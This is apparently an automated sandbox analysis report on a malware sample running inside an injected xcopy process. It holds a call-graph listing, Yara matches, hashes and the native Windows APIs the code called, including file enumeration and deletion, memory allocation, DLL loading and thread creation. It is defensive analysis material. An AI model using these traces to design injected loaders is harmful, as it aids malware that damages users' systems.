81188->81189 81189->81162 81191 2f4e584 81190->81191 81191->81172 81192 2f4a010 81197 2f49d40 81192->81197 81194 2f4a01d 81211 2f499e0 81194->81211 81196 2f4a039 81198 2f49d65 81197->81198 81222 2f476c0 81198->81222 81201 2f49ea2 81201->81194 81203 2f49eb9 81203->81194 81204 2f49eb0 81204->81203 81206 2f49fa1 81204->81206 81237 2f49440 81204->81237 81208 2f49ff9 81206->81208 81246 2f497a0 81206->81246 81209 2f59860 RtlFreeHeap 81208->81209 81210 2f4a000 81209->81210 81210->81194 81212 2f499f6 81211->81212 81220 2f49a01 81211->81220 81213 2f59940 RtlAllocateHeap 81212->81213 81213->81220 81214 2f49a17 81214->81196 81215 2f476c0 GetFileAttributesW 81215->81220 81216 2f49d0e 81217 2f49d27 81216->81217 81218 2f59860 RtlFreeHeap 81216->81218 81217->81196 81218->81217 81219 2f49440 RtlFreeHeap 81219->81220 81220->81214 81220->81215 81220->81216 81220->81219 81221 2f497a0 RtlFreeHeap 81220->81221 81221->81220 81223 2f476e1 81222->81223 81224 2f476f3 81223->81224 81225 2f476e8 GetFileAttributesW 81223->81225 81224->81201 81226 2f51dd0 81224->81226 81225->81224 81227 2f51dde 81226->81227 81228 2f51de5 81226->81228 81227->81204 81229 2f43d70 LdrLoadDll 81228->81229 81230 2f51e1a 81229->81230 81231 2f51e29 81230->81231 81250 2f518a0 LdrLoadDll 81230->81250 81233 2f59940 RtlAllocateHeap 81231->81233 81236 2f51fc4 81231->81236 81235 2f51e42 81233->81235 81234 2f59860 RtlFreeHeap 81234->81236 81235->81234 81235->81236 81236->81204 81238 2f49466 81237->81238 81251 2f4cc70 81238->81251 81240 2f494cd 81241 2f49650 81240->81241 81242 2f494eb 81240->81242 81243 2f49635 81241->81243 81244 2f49300 RtlFreeHeap 81241->81244 81242->81243 81256 2f49300 81242->81256 81243->81204 81244->81241 81247 2f497c6 81246->81247 81248 2f4cc70 RtlFreeHeap 81247->81248 81249 2f49842 81248->81249 81249->81206 81250->81231 81253 2f4cc71 81251->81253 81252 2f4cc93 81252->81240 81253->81252 81254 2f59860 RtlFreeHeap 81253->81254 81255 2f4cccc 81254->81255 81255->81240 81257 2f49316 81256->81257 81260 2f4cce0 81257->81260 81259 2f4941c 81259->81242 81261 2f4cd04 81260->81261 81262 2f4cd9c 81261->81262 81263 2f59860 RtlFreeHeap 81261->81263 81262->81259 81263->81262 81264 2f40390 81265 2f403a9 81264->81265 81266 2f43d70 LdrLoadDll 81265->81266 81267 2f403c7 81266->81267 81268 2f40400 PostThreadMessageW 81267->81268 81269 2f40413 81267->81269 81268->81269 81270 2f48f50 81271 2f48f57 81270->81271 81271->81270 81272 2f48f78 81271->81272 81273 2f59860 RtlFreeHeap 81271->81273 81273->81272 81274 2f578d0 81275 2f578f7 81274->81275 81276 2f5793f 81274->81276 81277 2f57955 NtDeleteFile 81276->81277 81278 2f54950 81279 2f549aa 81278->81279 81281 2f549b7 81279->81281 81282 2f524f0 81279->81282 81283 2f597d0 NtAllocateVirtualMemory 81282->81283 81285 2f52531 81283->81285 81284 2f52636 81284->81281 81285->81284 81286 2f43d70 LdrLoadDll 81285->81286 81288 2f52577 81286->81288 81287 2f525b0 Sleep 81287->81288 81288->81284 81288->81287 81289 2f4299c 81290 2f470f0 2 API calls 81289->81290 81291 2f429ac 81290->81291 81292 2f57970 NtClose 81291->81292 81293 2f429c1 81291->81293 81292->81293 81296 2f39380 81298 2f3938f 81296->81298 81297 2f393d0 81298->81297 81299 2f393bd CreateThread 81298->81299 81300 2f41fc0 81301 2f41fe5 81300->81301 81302 2f43d70 LdrLoadDll 81301->81302 81303 2f4201b 81302->81303 81304 2f45890 2 API calls 81303->81304 81305 2f42043 81303->81305 81304->81305 81306 2f46340 81307 2f4636a 81306->81307 81310 2f472a0 81307->81310 81309 2f46394 81311 2f472bd 81310->81311 81317 2f570e0 81311->81317 81313 2f4730d 81314 2f47314 81313->81314 81315 2f571c0 LdrInitializeThunk 81313->81315 81314->81309 81316 2f4733d 81315->81316 81316->81309 81318 2f57107 81317->81318 81319 2f57173 81317->81319 81318->81313 81322 3922f30 LdrInitializeThunk 81319->81322 81320 2f571ac 81320->81313 81322->81320 81323 2f57680 81324 2f5772c 81323->81324 81326 2f576a8 81323->81326 81325 2f57742 NtCreateFile 81324->81325 81327 2f56e40 81328 2f56ec7 81327->81328 81330 2f56e67 81327->81330 81332 3922ee0 LdrInitializeThunk 81328->81332 81329 2f56ef8 81332->81329 81338 2f50b00 81343 2f50b0f 81338->81343 81339 2f50b9c 81340 2f50b56 81341 2f59860 RtlFreeHeap 81340->81341 81342 2f50b66 81341->81342 81343->81339 81343->81340 81344 2f50b97 81343->81344 81345 2f59860 RtlFreeHeap 81344->81345 81345->81339

                                  Executed Functions

                                  Function 02F393E0 Relevance: 37.9, Strings: 30, Instructions: 435COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 116 2f393e0-2f3973c 117 2f3974d-2f39759 116->117 118 2f3975b-2f3976d 117->118 119 2f3976f-2f39779 117->119 118->117 120 2f3978a-2f39793 119->120 122 2f397b1-2f397bd 120->122 123 2f39795-2f397a1 120->123 126 2f397e2-2f397e9 122->126 127 2f397bf-2f397e0 122->127 124 2f397a3-2f397a9 123->124 125 2f397af 123->125 124->125 125->120 129 2f397f0-2f397f4 126->129 127->122 130 2f397f6-2f3981a 129->130 131 2f3981c-2f39820 129->131 130->129 132 2f39843-2f39851 131->132 133 2f39822-2f39841 131->133 134 2f39857-2f3985b 132->134 133->131 135 2f39884-2f3988d 134->135 136 2f3985d-2f39882 134->136 137 2f3989a-2f398a0 135->137 138 2f3988f-2f39898 135->138 136->134 139 2f398a6-2f398ac 137->139 138->139 140 2f398b2-2f398bb 139->140 141 2f398c1-2f398da 140->141 142 2f39ad5-2f39adc 140->142 141->141 143 2f398dc-2f398f4 141->143 144 2f39b06-2f39b0a 142->144 145 2f39ade-2f39af0 142->145 146 2f398f6 143->146 147 2f398fb-2f39902 143->147 150 2f39b2d-2f39b34 144->150 151 2f39b0c-2f39b2b 144->151 148 2f39af2-2f39af6 145->148 149 2f39af7-2f39af9 145->149 146->142 152 2f39904-2f39916 147->152 153 2f3992c-2f39972 147->153 148->149 154 2f39b04 149->154 155 2f39afb-2f39b01 149->155 156 2f39b3a call 2f594f0 150->156 157 2f39c68-2f39c72 150->157 151->144 159 2f39918-2f3991c 152->159 160 2f3991d-2f3991f 152->160 161 2f39983-2f3998f 153->161 154->142 155->154 164 2f39b3f-2f39b58 156->164 159->160 165 2f39921-2f39927 160->165 166 2f3992a 160->166 162 2f39991-2f3999d 161->162 163 2f3999f-2f399a6 161->163 162->161 168 2f399b5-2f399c9 163->168 169 2f399a8-2f399b2 163->169 164->164 170 2f39b5a-2f39b64 164->170 165->166 166->147 172 2f399da-2f399e6 168->172 169->168 171 2f39b75-2f39b7e 170->171 173 2f39b80-2f39b8c 171->173 174 2f39b9c-2f39ba3 171->174 175 2f399e8-2f399fa 172->175 176 2f399fc-2f39a06 172->176 177 2f39b9a 173->177 178 2f39b8e-2f39b94 173->178 181 2f39ba5-2f39bbb 174->181 182 2f39bc8-2f39bd2 174->182 175->172 180 2f39a17-2f39a23 176->180 177->171 178->177 184 2f39a33-2f39a3d 180->184 185 2f39a25-2f39a31 180->185 186 2f39bc6 181->186 187 2f39bbd-2f39bc3 181->187 188 2f39be3-2f39bef 182->188 190 2f39a3f-2f39a5c 184->190 191 2f39a5e-2f39a68 184->191 185->180 186->174 187->186 192 2f39bf1-2f39c03 188->192 193 2f39c05-2f39c0f 188->193 190->184 196 2f39a79-2f39a82 191->196 192->188 195 2f39c20-2f39c2c 193->195 199 2f39c2e-2f39c3a 195->199 200 2f39c3c-2f39c40 195->200 197 2f39a84-2f39a97 196->197 198 2f39a99-2f39aa3 196->198 197->196 202 2f39ab4-2f39abd 198->202 199->195 200->157 204 2f39c42-2f39c66 200->204 205 2f39ad0 202->205 206 2f39abf-2f39ace 202->206 204->200 205->140 206->202
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: j$d$+m$.G$5$5F$?]$?}$G1$H$Nc$W0$Xf$\$^$_$`$`7$`g$mW$nq$oB$t$t?$tP$u$uk$wn$k${
                                  • API String ID: 0-1536851386
                                  • Opcode ID: d2e280d988a36fa30307a7b3729d17d8e6303bfcab3e3188918daa38a9912e39
                                  • Instruction ID: 97d89548ea5992148ebd9548bb897d8a65098251fece701233d462374a37cd80
                                  • Opcode Fuzzy Hash: d2e280d988a36fa30307a7b3729d17d8e6303bfcab3e3188918daa38a9912e39
                                  • Instruction Fuzzy Hash: 8A32BFB0E05229CBEF65CF45C9947EDBBB2BB45348F2081D9C1096B390CBB95A89CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F4B7A0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F4B884
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02F4B8BF
                                  • FindClose.KERNELBASE(?), ref: 02F4B8CA
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 0cbf1fa5584d6a1ec209db0246f8499e24142ef731ca5de30fb36001dd7c5ea9
                                  • Instruction ID: 163b88375f747418f3705a1b8fd77b58ab6b72e1dcaaa1cb9267a004b121dcaa
                                  • Opcode Fuzzy Hash: 0cbf1fa5584d6a1ec209db0246f8499e24142ef731ca5de30fb36001dd7c5ea9
                                  • Instruction Fuzzy Hash: C8315271D00318BBDB20EB64CC89FEF777DAF44748F144458BA08A7181DBB0AA859BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F57680 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F57773
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: cf018d6c542dcef03741dd34ea96751def6e419a17db5e379fca68963f422c4a
                                  • Instruction ID: e48009537be1cc5f736bd77cf9ec0d7da1fc498c2e0808d0a60d39aed8e959e0
                                  • Opcode Fuzzy Hash: cf018d6c542dcef03741dd34ea96751def6e419a17db5e379fca68963f422c4a
                                  • Instruction Fuzzy Hash: DC3193B5A11608AFCB14DF99DC80EDFB7B9AF8C354F108219FA19A3240D770A851CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F577E0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F578BE
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 67128b11a4b4a6b84c578c6158015fa80bc9538983fac68061dd275e320b4ad3
                                  • Instruction ID: b87b1dedc4b827b5d61cffdcc2424c3e00600df16f12d9e87a7f87e52350f82b
                                  • Opcode Fuzzy Hash: 67128b11a4b4a6b84c578c6158015fa80bc9538983fac68061dd275e320b4ad3
                                  • Instruction Fuzzy Hash: 0C31B8B5A10208AFDB14DF59D881EEFB7B9EF88354F108619FE19A7240D770A851CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F57AC0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(02F412EE,?,02F56717,00000000,00000004,00003000,?,?,?,?,?,02F56717,02F412EE,564CEC83,02F412EE,00000000), ref: 02F57B7D
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 01fa65412ad528fffbacf1f2427499a73a7c78b2a3290bfeb3c302fd5a29c01e
                                  • Instruction ID: f9ce8b3d20b3eeaaa580d4366e615386d5d3fb2c34ad22d7f3c181958a3d7a1e
                                  • Opcode Fuzzy Hash: 01fa65412ad528fffbacf1f2427499a73a7c78b2a3290bfeb3c302fd5a29c01e
                                  • Instruction Fuzzy Hash: 08211BB5A00608ABDB14DF59DC41FEFB7A9EF88350F108609FE19A7240D774A851CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F578D0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: b71c8c79b0eedf6cd6781f45bab16acb294b7275b4658cc78bb3f1a2ba6faa9a
                                  • Instruction ID: 74b4c37211e34daf6ff92b38f17313486e5e6b09143f969d7ae6d99e42745da9
                                  • Opcode Fuzzy Hash: b71c8c79b0eedf6cd6781f45bab16acb294b7275b4658cc78bb3f1a2ba6faa9a
                                  • Instruction Fuzzy Hash: DB01AD76A00218BBE620EA64CC01FEB77ADDF85350F408509FF59A7280DBB07811CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F57970 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F579A7
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 43d2ed2439114ee81b7b232533c9cb5fa2a1d2599db66f1e43638d96395448c1
                                  • Instruction ID: e40d50fefba9701b42b7bdc31af5d45c998b3cc3e5f877f8236016bec842caaa
                                  • Opcode Fuzzy Hash: 43d2ed2439114ee81b7b232533c9cb5fa2a1d2599db66f1e43638d96395448c1
                                  • Instruction Fuzzy Hash: 35E046322002147BC620AA59DC01FDB776DDFCA7A0F108416FA0AAB281C670B9008AE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03924340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 168ae7cc502e30552526a52d88b81f06d972a528c581d4ba35cc85c368027ae3
                                  • Instruction ID: 09cee1785f8ccc885a368b47ae4388bfc4f577d9844792e00ab7e393f50eca3b
                                  • Opcode Fuzzy Hash: 168ae7cc502e30552526a52d88b81f06d972a528c581d4ba35cc85c368027ae3
                                  • Instruction Fuzzy Hash: E290027560990412A140B1584888546405997E1301B55C011F042C554C8B148A5A6361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03923090 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8444c4ea1808606c7e06cf8f2a5b1d1c6becfc1921fe0e8e7cb0de4da54239d8
                                  • Instruction ID: 42eecacf8c0c65a0975fbf0ff700bde1918cbb22c03328593483936612fc5893
                                  • Opcode Fuzzy Hash: 8444c4ea1808606c7e06cf8f2a5b1d1c6becfc1921fe0e8e7cb0de4da54239d8
                                  • Instruction Fuzzy Hash: D590026524550C02E140B1588418707005AC7D1601F55C011B002C554D87168A6976B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03924650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 47d32cb0defc8f01772113a8c07586571ec000855250ee86b666db927b57e8dd
                                  • Instruction ID: b3495f9c2f4ed5902475f6a0b97b154706e0879e85bae3f2c93e0f027a0f1a5e
                                  • Opcode Fuzzy Hash: 47d32cb0defc8f01772113a8c07586571ec000855250ee86b666db927b57e8dd
                                  • Instruction Fuzzy Hash: 419002A5605604425140B1584808406605997E2301395C115B055C560C87188959A269
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 039235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6bcdece0913c9f1d9ba7f337a33d378e7d7f693bc6787f734571a1c1730de755
                                  • Instruction ID: 4f24faa7dd3f353476b84bdc1d78932e007f1e3b36cb88b568d080f836c74822
                                  • Opcode Fuzzy Hash: 6bcdece0913c9f1d9ba7f337a33d378e7d7f693bc6787f734571a1c1730de755
                                  • Instruction Fuzzy Hash: 1E90027560960802E100B1584518706105987D1201F65C411B042C568D87958A5575A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0e707f0c2e6b059b22f8b6d5687c986b7b5c123c789b2644a2854dfa5eaf9a88
                                  • Instruction ID: c62654c3f01e711269a331ff6c2bc742ed1dbbe27b03734b0486581a6b60f8af
                                  • Opcode Fuzzy Hash: 0e707f0c2e6b059b22f8b6d5687c986b7b5c123c789b2644a2854dfa5eaf9a88
                                  • Instruction Fuzzy Hash: 8290027560950C02E150B1584418746005987D1301F55C011B002C654D87558B5976A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c54a742fc73fb7066cf6821aeb1eb15da74465c48cd18725a9bbb27cddf0f14d
                                  • Instruction ID: 76aef941f98af5bd60b2524110f68c15579a70b46ee86c76d3757e95413e9f18
                                  • Opcode Fuzzy Hash: c54a742fc73fb7066cf6821aeb1eb15da74465c48cd18725a9bbb27cddf0f14d
                                  • Instruction Fuzzy Hash: FE90027520550C02E180B158440864A005987D2301F95C015B002D654DCB158B5D77A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2dd4d6cd6a1b10d3d1a7b81ad6617f171221497fd37c9dc43f7375a782da1340
                                  • Instruction ID: 0e340211fb13060d6b9410810eccb0f730447b66325ce97ec8456e2dba413f93
                                  • Opcode Fuzzy Hash: 2dd4d6cd6a1b10d3d1a7b81ad6617f171221497fd37c9dc43f7375a782da1340
                                  • Instruction Fuzzy Hash: BA90027520954C42E140B1584408A46006987D1305F55C011B006C694D97258E59B661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d5afe4b9df5b23df10ee4894e9db889721689e3eeaf55659ebd1d82a524b3487
                                  • Instruction ID: 0ecc10c72318d5352bb41bb8929244413391cc637bc4d5c1739f335882bb7942
                                  • Opcode Fuzzy Hash: d5afe4b9df5b23df10ee4894e9db889721689e3eeaf55659ebd1d82a524b3487
                                  • Instruction Fuzzy Hash: B59002A5206504035105B1584418616405E87E1201B55C021F101C590DC62589957125
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9a7a023e102e55d42e0546a1e211594f6fc613ceb7da60b3eb7d3af70d72b96f
                                  • Instruction ID: 31b23b41098db73c19f358371cf3faa808d19542fd317a335213742f25374808
                                  • Opcode Fuzzy Hash: 9a7a023e102e55d42e0546a1e211594f6fc613ceb7da60b3eb7d3af70d72b96f
                                  • Instruction Fuzzy Hash: 41900269215504031105F5580708507009A87D6351355C021F101D550CD72189656121
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03922AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5fac10d75a0dba70f2a8aed8603bcaa36b792721bd4946da0a2d699e24654a8e
                                  • Instruction ID: 3164c46410b2a60e497cbd89b496c413c9b9ed0f4d4002a36acb0f225a90fb4b
                                  • Opcode Fuzzy Hash: 5fac10d75a0dba70f2a8aed8603bcaa36b792721bd4946da0a2d699e24654a8e
                                  • Instruction Fuzzy Hash: FC900269225504021145F558060850B049997D7351395C015F141E590CC72189696321
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 039239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
